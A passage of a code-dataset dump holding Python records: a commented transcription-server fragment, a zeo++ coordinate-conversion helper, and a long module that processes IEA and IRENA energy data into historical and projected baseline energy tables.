encoding=\"utf-8\")\n# # Generator for the transcript\n# for line in iter(proc.stdout.readline, b''):\n# if not line:\n# break\n# if line.startswith(b\"[\"):\n# line = line.decode(\"utf8\").strip().split(\"]\")[1]\n# transcript_file.write(line)\n# yield f\"{line}\\n\"\n# else:\n# continue\n\n# # Run speaker_diff\n# wav_file_path = f\"{base_file_name}.wav\"\n# csv_file_path = f\"{MEDIA_PATH}/{uuid_str}.csv\"\n# speaker_diar = StandardizeOutput(wav_file_path=wav_file_path, csv_file_path=csv_file_path)\n# speaker_diar.get_standardized_output()\n# yield f\"Speaker diff output:\\n{speaker_diar.final_output}\\n\"\n\n'''\n","repo_name":"clockcoinG1/whisper_transcription_and_diarization_server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1594458316","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Distributed under the terms of the MIT License.\n\n\"\"\"\nFunctions that are useful for zeo++ usage\n\nAuthor: Andrew Tarzia\n\nDate Created: 28 Jul 2019\n\"\"\"\n\n\ndef convert_zsa_to_xyz(file):\n \"\"\"\n Convert .zsa coordinates into XYZ file for visualisation.\n\n \"\"\"\n with open(file, 'r') as f:\n data = f.readlines()\n\n for i, j in enumerate(data):\n if 'color red' in j:\n red_mention = i\n\n greens = data[1:red_mention]\n reds = data[red_mention+1:]\n\n n_atoms = len(greens) + len(reds)\n xyz_file = file.replace('.zsa', '_z.xyz')\n\n with open(xyz_file, 'w') as f:\n f.write(f'{n_atoms}\\nWritten by Andrew Tarzia!\\n')\n for g in greens:\n id = 'H'\n D = g.rstrip().replace('{', '').replace('}', '')\n x, y, z = [\n i for i in D.replace('point', '').split(' ') if i\n ]\n f.write(f'{id} {x} {y} {z}\\n')\n for g in reds:\n id = 'P'\n D = g.rstrip().replace('{', '').replace('}', '')\n x, y, z = [\n i for i in D.replace('point', '').split(' ') if i\n ]\n f.write(f'{id} {x} {y} {z}\\n')\n","repo_name":"andrewtarzia/atools","sub_path":"atools/zeopp_f.py","file_name":"zeopp_f.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3280302913","text":"# region\n\nimport multiprocessing\nimport os\n\nimport numpy as np\nimport pandas as pd\nfrom numpy import NaN\nfrom pandarallel import pandarallel\nfrom scipy.optimize import 
differential_evolution\n\npandarallel.initialize(progress_bar=True)\n\n# endregion\n\n\n# define a function to process the dataframes in parallel\ndef process_df_function(regions, data_start_year, data_end_year):\n energy_historical_temp = pd.DataFrame([])\n\n for region in regions:\n # Handle \"x\", \"c\", \"..\" qualifiers. IEA documentation is not clear on what\n # \"x\" represents; \"c\" represents \"confidential\",\n # \"..\" represents \"not available\"\n energy_historical = (\n pd.DataFrame(\n pd.read_fwf(\n str(\"podi/data/IEA/\" + region + \".txt\"),\n colspecs=[\n (0, 15),\n (16, 31),\n (32, 47),\n (48, 63),\n (64, 70),\n (71, -1),\n ],\n names=[\n \"region\",\n \"product_short\",\n \"year\",\n \"flow_short\",\n \"unit\",\n \"value\",\n ],\n dtype={\n \"region\": \"category\",\n \"product_short\": \"category\",\n \"year\": \"int\",\n \"flow_short\": \"category\",\n \"unit\": \"category\",\n },\n )\n )\n .replace([\"c\"], NaN)\n .replace([\"..\"], NaN)\n .replace([\"x\"], NaN)\n )\n\n # Change values to float\n energy_historical[\"value\"] = energy_historical[\"value\"].astype(float)\n\n # Change from all caps to lowercase\n energy_historical[\"region\"] = energy_historical[\"region\"].str.lower()\n\n # Format as a dataframe with timeseries as rows\n energy_historical = pd.pivot_table(\n energy_historical,\n values=\"value\",\n index=[\"region\", \"product_short\", \"flow_short\", \"unit\"],\n columns=\"year\",\n )\n\n # Not all regions have placeholders for all years, so they need to be created\n energy_historical = pd.DataFrame(\n index=energy_historical.index,\n columns=np.arange(data_start_year, data_end_year + 1, 1),\n data=NaN,\n ).combine_first(energy_historical)\n\n # Backfill missing data using oldest data point\n energy_historical = energy_historical.fillna(method=\"backfill\", axis=1)\n\n # For rows with data only prior to data_start_year, front fill to data_start_year\n energy_historical.update(\n energy_historical[energy_historical.loc[:, data_start_year].isna()]\n .loc[:, :data_start_year]\n .fillna(method=\"ffill\", axis=1)\n )\n\n # Remove duplicate regions created due to name overlaps\n energy_historical = energy_historical.loc[[region.lower()], :]\n\n # Filter for data start_year and data_end_year, which can be different depending on region/product/flow because data becomes available at different times\n energy_historical = energy_historical.loc[\n :, data_start_year:data_end_year\n ]\n\n # Build dataframe consisting of all regions\n energy_historical_temp = pd.concat(\n [energy_historical_temp, energy_historical]\n )\n\n return energy_historical_temp\n\n\ndef energy(model, scenario, data_start_year, data_end_year, proj_end_year):\n ############################\n # LOAD HISTORICAL ENERGY #\n ############################\n\n # region\n\n # Download IEA World Energy Balances. As of Q1 2023, this dataset must be\n # purchased. Choose the ZIP format of the 'World energy balances' file\n # available [here](https://www.iea.org/data-and-statistics/data-product/\n # world-energy-balances). Download the file to `pd/data/IEA` on your local\n # machine and extract the file. 
Run the 'splitregion.sh' script, which\n # splits the data by region and saves each to a .txt file with the\n # filename matching the region name.\n\n # Load historical energy data for each region.\n regions_list = np.array_split(\n pd.read_csv(\"podi/data/IEA/Regions.txt\").squeeze(\"columns\"),\n multiprocessing.cpu_count(),\n )\n\n with multiprocessing.Pool() as pool:\n energy_historical = pd.concat(\n pool.starmap(\n process_df_function,\n zip(\n regions_list,\n [(data_start_year) for _ in regions_list],\n [(data_end_year) for _ in regions_list],\n ),\n )\n )\n\n # Add model and scenario indices\n energy_historical = pd.concat(\n [\n pd.concat(\n [energy_historical], keys=[\"baseline\"], names=[\"scenario\"]\n )\n ],\n keys=[\"PD22\"],\n names=[\"model\"],\n )\n\n # set energy_historical index 'model' and 'scenario' to dtype 'category'\n energy_historical.index = energy_historical.index.set_levels(\n energy_historical.index.levels[0].astype(\"category\"),\n level=0,\n )\n\n energy_historical.index = energy_historical.index.set_levels(\n energy_historical.index.levels[1].astype(\"category\"),\n level=1,\n )\n\n # Filter product categories that are redundant or unused\n products = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/IEA/Other/IEA_Product_Definitions.csv\",\n usecols=[\"product_category\", \"product_short\"],\n dtype={\n \"product_category\": \"category\",\n \"product_short\": \"category\",\n },\n )\n )\n .set_index(\"product_category\")\n .loc[\n [\n \"Biofuels and Waste\",\n \"Coal\",\n \"Crude, NGL, refinery feedstocks\",\n \"Electricity and Heat\",\n \"Natural gas\",\n \"Oil products\",\n \"Oil shale\",\n \"Peat and peat products\",\n ]\n ]\n )[\"product_short\"]\n\n # Filter out products that are summations of other products\n products = products[\n ~products.isin(\n [\n \"TOTAL\",\n \"TOTPRODS\",\n \"SOLWIND\",\n \"MTOTSOLID\",\n \"MTOTOIL\",\n \"MTOTOTHER\",\n \"MRENEW\",\n \"CRNGFEED\",\n \"COMRENEW\",\n ]\n )\n ]\n\n # Filter out flow categories that are redundant or unused\n flows = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/IEA/Other/IEA_Flow_Definitions.csv\",\n usecols=[\"flow_category\", \"flow_short\"],\n dtype={\"flow_category\": \"category\", \"flow_short\": \"category\"},\n )\n )\n .set_index(\"flow_category\")\n .loc[\n [\n \"Energy industry own use and Losses\",\n \"Electricity output\",\n \"Final consumption\",\n \"Heat output\",\n \"Supply\",\n \"Transformation processes\",\n ]\n ]\n )[\"flow_short\"]\n\n # Filter out flows that are summations of other products or for energy balance\n # purposes (exports, imports, statistical differences, stock changes, transfers)\n flows = flows[\n ~flows.isin(\n [\n \"ELOUTPUT\",\n \"EXPORTS\",\n \"HEATOUT\",\n \"IMPORTS\",\n \"INDPROD\",\n \"LIQUEFAC\",\n \"NONENUSE\",\n \"STATDIFF\",\n \"STOCKCHA\",\n \"TES\",\n \"TFC\",\n \"TRANSFER\",\n \"TOTIND\",\n \"TOTTRANF\",\n \"TOTTRANS\",\n \"TOTENGY\",\n \"OWNUSE\",\n ]\n )\n ]\n\n energy_historical = energy_historical.loc[\n slice(None), slice(None), slice(None), products, flows\n ]\n\n # Add IRENA data for select electricity technologies by downloading for all regions,\n # all technologies, and all years from https://pxweb.irena.org/pxweb/en/IRENASTAT/IRENASTAT__Power%20Capacity%20and%20Generation/RE-ELECGEN_2022_cycle2.px/.\n # Select the download option 'Comma delimited with heading' and save as a csv file\n # in podi/data/IRENA/ . Change the header in column A from 'Region/country/area' to\n # 'region'. 
Double check that the filename is 'RE-ELECGEN_20220805-204524.csv' and\n    # if not, update the filename below.\n\n    # region\n    irena = pd.read_csv(\n        \"podi/data/IRENA/RE-ELECGEN_20220805-204524.csv\", header=2\n    )\n\n    # Filter for technologies that are not overlapping, and rename 'Technology' index\n    # to 'product_short'\n    irena = irena.loc[\n        irena[\"Technology\"].isin(\n            [\"Onshore wind energy\", \"Offshore wind energy\"]\n        )\n    ].replace(\n        {\n            \"Technology\": {\n                \"Onshore wind energy\": \"ONSHORE\",\n                \"Offshore wind energy\": \"OFFSHORE\",\n            }\n        }\n    )\n    irena.rename(columns={\"Technology\": \"product_short\"}, inplace=True)\n\n    # Add index flow_short\n    irena[\"flow_short\"] = \"ELMAINE\"\n\n    # Replace \"..\" (not available) with 0\n    irena.replace(\"..\", 0, inplace=True)\n\n    # Add index labels for model, scenario, unit (in GWh but will be converted to TJ\n    # later in this section with the other 'Electricity Output' variables)\n    irena[\"model\"] = model\n    irena[\"scenario\"] = \"baseline\"\n    irena[\"unit\"] = \"TJ\"\n    irena.set_index(\n        [\"model\", \"scenario\", \"region\", \"product_short\", \"flow_short\", \"unit\"],\n        inplace=True,\n    )\n\n    # Add WEB region names\n    regions = (\n        pd.DataFrame(\n            pd.read_csv(\n                \"podi/data/region_categories.csv\",\n                usecols=[\"WEB Region\", \"IRENA Region\"],\n                dtype={\"WEB Region\": \"category\", \"IRENA Region\": \"category\"},\n            ).dropna(axis=0)\n        )\n        .set_index([\"IRENA Region\"])\n        .rename_axis(index={\"IRENA Region\": \"region\"})\n    )\n\n    irena = (\n        irena.reset_index()\n        .merge(regions, left_on=[\"region\"], right_on=[\"region\"])\n        .set_index(\n            [\n                \"model\",\n                \"scenario\",\n                \"WEB Region\",\n                \"region\",\n                \"product_short\",\n                \"flow_short\",\n                \"unit\",\n            ]\n        )\n        .droplevel(\"region\")\n        .rename_axis(index={\"WEB Region\": \"region\"})\n    )\n    irena.index = irena.index.set_levels(\n        irena.index.levels[2].str.lower().astype(\"category\"), level=2\n    )\n\n    # Set column type\n    irena.columns = irena.columns.astype(int)\n\n    # Add missing years between first_valid_index and data_start_year\n    irena[np.arange(data_start_year, irena.columns.min(), 1)] = 0\n    irena = irena.reindex(sorted(irena.columns), axis=1)\n\n    # Filter for data_start_year and data_end_year\n    irena = irena.loc[:, data_start_year:data_end_year]\n\n    # IRENA data starts at 2000, so if data_start_year is <2000, use IEA data for WIND,\n    # assuming it is onshore. 
Drop IEA WIND and SOLARPV to avoid duplication with\n # IRENA ONSHORE/OFFSHORE\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=\"WIND\", level=3),\n pd.concat(\n [\n energy_historical[\n energy_historical.index.get_level_values(3).isin(\n [\"WIND\"]\n )\n ]\n .loc[:, :2000]\n .rename(index={\"WIND\": \"ONSHORE\"}),\n irena[\n irena.index.get_level_values(3).isin([\"ONSHORE\"])\n ].loc[:, 2001:],\n ],\n axis=1,\n ),\n irena[irena.index.get_level_values(3).isin([\"OFFSHORE\"])],\n ]\n )\n\n # endregion\n\n # Add product and flow labels to energy_historical\n\n labels = pd.DataFrame(\n pd.read_csv(\n \"podi/data/product_flow_labels.csv\",\n usecols=[\n \"product_short\",\n \"flow_short\",\n \"sector\",\n \"EIA Product\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n )\n ).set_index([\"product_short\", \"flow_short\"])\n\n energy_historical = (\n (\n energy_historical.reset_index()\n .set_index([\"product_short\", \"flow_short\"])\n .merge(labels, on=[\"product_short\", \"flow_short\"])\n )\n .reset_index()\n .set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_short\",\n \"flow_short\",\n \"unit\",\n \"EIA Product\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ]\n )\n )\n\n # Flow AGRICULT was doubled to create sectors 'Agriculture' and 'Forests & Wetlands'. Scale down to estimate 80% in 'Agriculture' and 20% in 'Forests & Wetlands'\n\n # region\n\n energy_historical.loc[\n (energy_historical.reset_index().sector == \"Forests & Wetlands\").values\n ] = energy_historical.loc[\n (energy_historical.reset_index().sector == \"Forests & Wetlands\").values\n ].apply(\n lambda x: x * 0.2\n )\n\n energy_historical.loc[\n (energy_historical.reset_index().sector == \"Agriculture\").values\n ] = energy_historical.loc[\n (energy_historical.reset_index().sector == \"Agriculture\").values\n ].apply(\n lambda x: x * 0.8\n )\n\n # endregion\n\n # Split ROAD Flow into Two- and three-wheeled, Light, Medium (Buses), Heavy (Trucks)\n\n # region\n\n subsector_props = pd.DataFrame(\n pd.read_csv(\n \"podi/data/tech_parameters.csv\",\n usecols=[\n \"region\",\n \"product_short\",\n \"scenario\",\n \"sector\",\n \"metric\",\n \"value\",\n ],\n ),\n ).set_index([\"region\", \"product_short\", \"scenario\", \"sector\", \"metric\"])\n\n # Create Two- and three-wheeled Flow (TTROAD) using estimate of the fraction of\n # ROAD that is Two- and three-wheeled\n ttroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2],\n \"ROAD\",\n \"baseline\",\n x.name[3],\n \"Two- and three-wheeled\",\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"TTROAD\"})\n )\n\n # Create Light-duty Flow (LIGHTROAD) using estimate of the fraction of ROAD that is\n # Light-duty vehicles\n lightroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"ROAD\", \"baseline\", x.name[3], \"Light\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"LIGHTROAD\"})\n )\n\n # Create Medium-duty Flow (MEDIUMROAD) using estimate of the fraction of ROAD that\n # is Medium-duty vehicles (Buses and Vans)\n mediumroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"ROAD\", \"baseline\", x.name[3], \"Medium\"\n ].values\n ),\n 
axis=1,\n )\n .rename(index={\"ROAD\": \"MEDIUMROAD\"})\n )\n\n # Create Heavy-duty Flow (HEAVYROAD) using estimate of the fraction of ROAD that is\n # Heavy-duty vehicles (Trucks)\n heavyroad = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"ROAD\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"ROAD\", \"baseline\", x.name[3], \"Heavy\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"ROAD\": \"HEAVYROAD\"})\n )\n\n # Drop ROAD Flow and add TTROAD, LIGHTROAD, MEDIUMROAD, HEAVYROAD\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"ROAD\"], level=5),\n ttroad,\n lightroad,\n mediumroad,\n heavyroad,\n ]\n )\n\n # endregion\n\n # Split DOMESAIR Flow into Short-range, Long-range\n\n # region\n\n # Create Short-range Flow (SDOMESAIR) using estimate of the fraction of DOMESAIR\n # that is Short-range\n sdomesair = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"DOMESAIR\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"DOMESAIR\", \"baseline\", x.name[3], \"Light\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"DOMESAIR\": \"SDOMESAIR\"})\n )\n\n # Create Long-range Flow (LDOMESAIR) using estimate of the fraction of DOMESAIR\n # that is Long-range\n ldomesair = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"DOMESAIR\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"DOMESAIR\", \"baseline\", x.name[3], \"Heavy\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"DOMESAIR\": \"LDOMESAIR\"})\n )\n\n # Drop DOMESAIR Flow and add SDOMESAIR and LDOMESAIR\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"DOMESAIR\"], level=5),\n sdomesair,\n ldomesair,\n ]\n )\n\n # endregion\n\n # Split RAIL Flow into Light-duty, Heavy-duty\n\n # region\n\n # Create Light-duty Flow (LIGHTRAIL) using estimate of the fraction of RAIL that is\n # Light-duty\n lightrail = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"RAIL\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"RAIL\", \"baseline\", x.name[3], \"Light\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"RAIL\": \"LIGHTRAIL\"})\n )\n\n # Create Heavy-duty Flow (HEAVYRAIL) using estimate of the fraction of RAIL that is\n # Heavy-duty\n heavyrail = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"RAIL\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"RAIL\", \"baseline\", x.name[3], \"Heavy\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"RAIL\": \"HEAVYRAIL\"})\n )\n\n # Drop RAIL Flow and add LIGHTRAIL and HEAVYRAIL\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"RAIL\"], level=5),\n lightrail,\n heavyrail,\n ]\n )\n\n # endregion\n\n # Split HEAT & HEATNS Products into LHEAT/LHEATNS (low temperature) and\n # HHEAT/HHEATNS (high temperature) heat\n\n # region\n\n # Create Low Temperature Heat Product (LHEAT) using estimate of the fraction of\n # HEAT that is low temperature\n lheat = (\n energy_historical[\n (\n (energy_historical.reset_index().product_short == \"HEAT\")\n | (energy_historical.reset_index().product_short == \"HEATNS\")\n ).values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n \"world\",\n x.name[4],\n \"baseline\",\n x.name[5],\n \"Low Temperature\",\n ].values\n ),\n axis=1,\n )\n .rename(index={\"HEAT\": \"LHEAT\", 
\"HEATNS\": \"LHEATNS\"})\n )\n\n # Create High Temperature Heat Product (HHEAT) using estimate of the fraction of\n # HEAT that is high temperature\n hheat = (\n energy_historical[\n (\n (energy_historical.reset_index().product_short == \"HEAT\")\n | (energy_historical.reset_index().product_short == \"HEATNS\")\n ).values\n ]\n .parallel_apply(\n lambda x: x\n * (\n 1\n - subsector_props.loc[\n \"world\",\n x.name[4],\n \"baseline\",\n x.name[5],\n \"Low Temperature\",\n ].values\n ),\n axis=1,\n )\n .rename(index={\"HEAT\": \"HHEAT\", \"HEATNS\": \"HHEATNS\"})\n )\n\n # Drop HEAT, HEATNS Products and add LHEAT, LHEATNS, HHEAT, HHEATNS\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"HEAT\", \"HEATNS\"], level=4),\n lheat,\n hheat,\n ]\n )\n\n # endregion\n\n # Split NONCRUDE Product into HYDROGEN and NONCRUDE\n\n # region\n\n # Create HYDROGEN Product (HYDROGEN) using estimate of the fraction of NONCRUDE\n # that is Hydrogen\n hydrogen = (\n energy_historical[\n (\n energy_historical.reset_index().product_short == \"NONCRUDE\"\n ).values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n \"world\", x.name[4], \"baseline\", x.name[5], \"Hydrogen\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"NONCRUDE\": \"HYDROGEN\"})\n )\n\n # Update NONCRUDE Product to be reduced by the estimate of HYDROGEN\n noncrude = energy_historical[\n (energy_historical.reset_index().product_short == \"NONCRUDE\").values\n ].parallel_apply(\n lambda x: x\n * (\n 1\n - subsector_props.loc[\n \"world\", x.name[4], \"baseline\", x.name[5], \"Hydrogen\"\n ].values\n ),\n axis=1,\n )\n\n # Drop old NONCRUDE Product and add HYDROGEN and new NONCRUDE\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"NONCRUDE\"], level=4),\n hydrogen,\n noncrude,\n ]\n )\n\n # endregion\n\n # Split SOLARPV Product into ROOFTOP and SOLARPV (utility) scale solar pv\n\n # region\n energy_historical.update(\n energy_historical[\n (energy_historical.reset_index().product_short == \"SOLARPV\").values\n ].parallel_apply(lambda x: x * 0.6, axis=1)\n )\n\n energy_historical = pd.concat(\n [\n energy_historical,\n (\n energy_historical[\n (\n energy_historical.reset_index().product_short\n == \"SOLARPV\"\n ).values\n ].parallel_apply(lambda x: x * 0.4, axis=1)\n ).rename(\n index={\n \"SOLARPV\": \"ROOFTOP\",\n \"Solar photovoltaics\": \"Rooftop solar photovoltaics\",\n }\n ),\n ]\n )\n\n # endregion\n\n # Add EIA region labels to energy_historical in order to match EIA regional\n # projected growth of each product\n\n # region\n\n regions = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/region_categories.csv\",\n usecols=[\"WEB Region\", \"EIA Region\"],\n ).dropna(axis=0)\n )\n .set_index([\"WEB Region\"])\n .rename_axis(index={\"WEB Region\": \"region\"})\n )\n regions.index = regions.index.str.lower()\n\n energy_historical = (\n (\n energy_historical.reset_index()\n .set_index([\"region\"])\n .merge(regions, on=[\"region\"])\n )\n .reset_index()\n .set_index([\"EIA Region\"])\n )\n\n # endregion\n\n # Add categories and long names for products and flows\n\n # region\n\n longnames = pd.read_csv(\n \"podi/data/IEA/Other/IEA_Product_Definitions.csv\",\n usecols=[\"product_category\", \"product_long\", \"product_short\"],\n )\n\n energy_historical[\"product_category\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"product_short\"] == x[\"product_short\"]][\n \"product_category\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n energy_historical[\"product_long\"] = 
energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"product_short\"] == x[\"product_short\"]][\n \"product_long\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n longnames = pd.read_csv(\n \"podi/data/IEA/Other/IEA_Flow_Definitions.csv\",\n usecols=[\"flow_category\", \"flow_long\", \"flow_short\"],\n )\n\n energy_historical[\"flow_category\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"flow_short\"] == x[\"flow_short\"]][\n \"flow_category\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n energy_historical[\"flow_long\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"flow_short\"] == x[\"flow_short\"]][\n \"flow_long\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n # if flow_short is 'AGRICULT' and sector is 'Agriculture' then rename flow_long to 'Agriculture'\n energy_historical = energy_historical.reset_index()\n energy_historical.update(\n energy_historical[\n (\n (energy_historical.flow_short == \"AGRICULT\")\n & (energy_historical.sector == \"Agriculture\")\n )\n ].parallel_apply(\n lambda x: x.replace(\n {\n \"Agriculture/forestry\": \"Agriculture\",\n }\n ),\n axis=1,\n )\n )\n\n # if flow_short is 'AGRICULT' and sector is 'Forests & Wetlands' then rename flow_long to 'Forests & Wetlands' and rename flow_short to 'FOREST'\n energy_historical.update(\n energy_historical[\n (\n (energy_historical.flow_short == \"AGRICULT\")\n & (energy_historical.sector == \"Forests & Wetlands\")\n ).values\n ].parallel_apply(\n lambda x: x.replace(\n {\n \"AGRICULT\": \"FOREST\",\n \"Agriculture/forestry\": \"Forests & Wetlands\",\n }\n ),\n axis=1,\n )\n )\n\n energy_historical = energy_historical.reset_index().set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n \"EIA Region\",\n \"EIA Product\",\n ]\n )\n\n # endregion\n\n # Convert Electricity output flow category from GWh to TJ\n energy_historical = energy_historical.astype(float)\n energy_historical.update(\n energy_historical[\n energy_historical.index.get_level_values(7) == \"Electricity output\"\n ].multiply(3.6)\n )\n\n # Convert AVBUNK & MARBUNK to be positive (they were negative by convention\n # representing an 'export' to an international region WORLDAV and WORLDMAR) and\n # change their flow_category to Final consumption,\n energy_historical[\n energy_historical.index.get_level_values(9).isin([\"AVBUNK\", \"MARBUNK\"])\n ] = energy_historical[\n energy_historical.index.get_level_values(9).isin([\"AVBUNK\", \"MARBUNK\"])\n ].abs()\n\n energy_historical_index = energy_historical.index.names\n energy_historical.reset_index(inplace=True)\n energy_historical = energy_historical.replace(\n \"Supply\", \"Final consumption\"\n )\n energy_historical.set_index(energy_historical_index, inplace=True)\n\n # Some flows in flow_category 'Transformation processes' are negative, representing\n # the ‘loss’ of a product as it transforms into another product. 
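(In the IEA energy balance convention, inputs to transformation processes carry a negative sign and outputs a positive one.)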
This is switched\n # to be consistent with positive values representing the consumption of a product.\n # Values that were already positive (representing production of a product) are\n # dropped to avoid double counting with flow_category 'Final consumption'.\n energy_historical[\n (\n energy_historical.index.get_level_values(7).isin(\n [\"Transformation processes\"]\n )\n )\n & (energy_historical.sum(axis=1) > 0)\n ] = 0\n\n energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Transformation processes\"]\n )\n ] = energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Transformation processes\"]\n )\n ].abs()\n\n # All flows in flow_category 'Energy industry own use and Losses' are negative,\n # representing the 'loss' of a product as the energy industry uses it to transform\n # one product into another. This is switched to be consistent with positive values\n # representing the consumption of a product.\n energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Energy industry own use and Losses\"]\n )\n ] = energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Energy industry own use and Losses\"]\n )\n ].abs()\n\n # Change non-energy use flows from flow_category value 'Final consumption' to\n # 'Non-energy use'.\n energy_historical_nonenergy = energy_historical[\n (\n energy_historical.reset_index().flow_short.isin(\n [\n \"NECHEM\",\n \"NECONSTRUC\",\n \"NEFOODPRO\",\n \"NEIND\",\n \"NEINONSPEC\",\n \"NEINTREN\",\n \"NEIRONSTL\",\n \"NEMACHINE\",\n \"NEMINING\",\n \"NENONFERR\",\n \"NENONMET\",\n \"NEOTHER\",\n \"NEPAPERPRO\",\n \"NETEXTILES\",\n \"NETRANS\",\n \"NETRANSEQ\",\n \"NEWOODPRO\",\n \"NONENUSE\",\n ]\n )\n ).values\n ]\n energy_historical = energy_historical.drop(\n energy_historical_nonenergy.index\n )\n\n energy_historical_nonenergy.reset_index(inplace=True)\n energy_historical_nonenergy.flow_category = \"Non-energy use\"\n energy_historical_nonenergy.set_index(\n energy_historical.index.names, inplace=True\n )\n energy_historical = (\n pd.concat([energy_historical, energy_historical_nonenergy])\n .loc[:, data_start_year:data_end_year]\n .sort_index()\n ).apply(pd.to_numeric, downcast=\"float\")\n\n for i in range(0, len(energy_historical.index.names)):\n energy_historical.index = energy_historical.index.set_levels(\n energy_historical.index.levels[i].astype(\"category\"), level=i\n )\n\n energy_historical.droplevel([\"EIA Region\", \"EIA Product\"]).to_csv(\n \"podi/data/energy_historical.csv\"\n )\n\n # endregion\n\n #############################\n # PROJECT BASELINE ENERGY #\n #############################\n\n # region\n\n # Load EIA energy projections\n energy_projection = (\n pd.read_excel(\n pd.ExcelFile(\"podi/data/EIA/EIA_IEO.xlsx\", engine=\"openpyxl\"),\n header=0,\n )\n .dropna(axis=\"index\", how=\"all\")\n .dropna(axis=\"columns\", thresh=2)\n ).loc[:, :proj_end_year]\n\n # Strip preceding space in EIA Sector values\n energy_projection[\"EIA Product\"] = energy_projection[\n \"EIA Product\"\n ].str.strip()\n\n # create dataframe of energy projections as annual % change\n energy_projection = (\n (\n pd.DataFrame(energy_projection).set_index(\n [\"EIA Region\", \"sector\", \"EIA Product\"]\n )\n )\n .pct_change(axis=1)\n .replace(NaN, 0)\n + 1\n ).loc[:, data_end_year + 1 :]\n\n # Make a copy of Industry values for Agriculture and Forests & Wetlands\n energy_projection = pd.concat(\n [\n energy_projection,\n energy_projection[\n (\n 
energy_projection.reset_index().sector.isin([\"Industrial\"])\n ).values\n ].rename(index={\"Industrial\": \"Agriculture\"}),\n energy_projection[\n (\n energy_projection.reset_index().sector.isin([\"Industrial\"])\n ).values\n ].rename(index={\"Industrial\": \"Forests & Wetlands\"}),\n ]\n )\n\n # Merge historical and projected energy\n energy_baseline = (\n (\n energy_historical.reset_index()\n .set_index([\"EIA Region\", \"sector\", \"EIA Product\"])\n .merge(\n energy_projection, on=[\"EIA Region\", \"sector\", \"EIA Product\"]\n )\n )\n .reset_index()\n .set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n \"EIA Region\",\n \"EIA Product\",\n ]\n )\n .droplevel([\"EIA Region\", \"EIA Product\"])\n ).sort_index()\n\n energy_baseline = energy_baseline.parallel_apply(\n lambda x: pd.concat(\n [x.loc[: data_end_year - 1], x.loc[data_end_year:].cumprod()]\n ),\n axis=1,\n )\n\n # Save\n if os.path.exists(\"podi/data/energy_baseline.parquet\"):\n os.remove(\"podi/data/energy_baseline.parquet\")\n energy_baseline.columns = energy_baseline.columns.astype(str)\n energy_baseline.to_parquet(\n \"podi/data/energy_baseline.parquet\", compression=\"brotli\"\n )\n 